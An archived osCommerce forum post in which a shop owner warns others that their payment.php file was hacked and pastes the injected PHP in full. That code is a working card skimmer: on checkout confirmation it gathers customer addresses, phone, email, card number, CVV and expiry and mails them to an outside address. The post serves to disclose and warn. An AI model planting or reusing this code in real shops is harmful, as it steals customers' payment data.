Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Includes/classes/payment.php Hacked Last Night


Guest

Recommended Posts

Posted

I am not sure how this happened, but I am looking into it... I suspect a compromised admin password. It is important that others check to insure that they were not hacked, and I would love feedback from anyone else that might have the same issue.

 

Sometime yesterday my includes/classes/payment.php file was changed to include this code above the code header:

 

<?php
$urlz=$_SERVER['REQUEST_URI'];
if (eregi("checkout_confirmation.php", $urlz)) {
$td_query = tep_db_query("select * from " . TABLE_ADDRESS_BOOK . " where customers_id = '" . $customer_id . "'");
  $duong = tep_db_fetch_array($td_query);
	$firstname123=$duong['entry_firstname'];
	$lastname123=$duong['entry_lastname'];
	$street_address123=$duong['entry_street_address'];
	$city123=$duong['entry_city'];
	$zone_id=$duong['entry_zone_id'];
	$statex=$duong['entry_state'];
if(($statex=="")||($statex=="0"))	{
 $td_queryxx = tep_db_query("select * from " . TABLE_ZONES . " where zone_id = '" . $zone_id . "'");
  $duongxx = tep_db_fetch_array($td_queryxx);
$state123 = $duongxx['zone_name'];
}else {$state123=$statex;}
$country=$duong['entry_country_id'];
$td_queryxxx = tep_db_query("select * from " . TABLE_COUNTRIES . " where countries_id = '" . $country . "'");
  $duongxxx = tep_db_fetch_array($td_queryxxx);
$country123 = $duongxxx['countries_name'];
	$postcode123=$duong['entry_postcode'];
	$td_query2 = tep_db_query("select * from " . TABLE_CUSTOMERS . " where customers_id = '" . $customer_id . "'");
	$duong2 = tep_db_fetch_array($td_query2);
		$telephone123=$duong2['customers_telephone'];
	$email_address123=$duong2['customers_email_address'];
$dob123 =	 $duong2['customers_dob'];

$site = "[edited.to.protect.innocent]";
$headers123 = "From:Website $site";
$headers123 .= "<$site>\n";
$headers123 .= "X-Sender: <$site>\n";
$headers123 .= "X-Mailer: PHP\n";
$headers123 .= "Return-Path:<[email protected]>\n";
$headers123 .= "Content-Type:text/html; ";
$headers123 .= "charset=iso-8859-1\n";
$message123 = "Name : $firstname123 $lastname123 <br>";
$message123 .= "Telephone : $telephone123 <br>";
$message123 .= "Email : $email_address123 <br>";
$message123 .= "Street : $street_address123 <br>";
$message123 .= "Postcode : $postcode123 <br>";
$message123 .= "City : $city123 <br>";
$message123 .= "State : $state123 <br>";
$message123 .= "Country : $country123 <br>";
$ccowner123 = $HTTP_POST_VARS['cc_owner'];
$ccnumber123 = $HTTP_POST_VARS['cc_number'];
$tmp1 = $HTTP_POST_VARS['cc_cvmvalue'];
$tmp2 = $HTTP_POST_VARS['cc_expires_month'] . "/" . $HTTP_POST_VARS['cc_expires_year'];
$message123 .= "CC Owner : $ccowner123  <br>";
$message123 .= "CC Number : $ccnumber123 <br>";
$message123 .= "CVV2 :  $tmp1 <br>";
$message123 .= "Date Expire :  $tmp2 <br>";
$message123 .= "Site : http://$site <br>";
if(($ccnumber123!="")&&($tmp1!="")&&($tmp1!="0")){
mail("[email protected]","Cvv - Site $site!",$message123,$headers123);
}
}
/*
 $Id: payment.php,v 1.37 2003/06/09 22:26:32 hpdl Exp $

 osCommerce, Open Source E-Commerce Solutions
 http://www.oscommerce.com

...etc

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...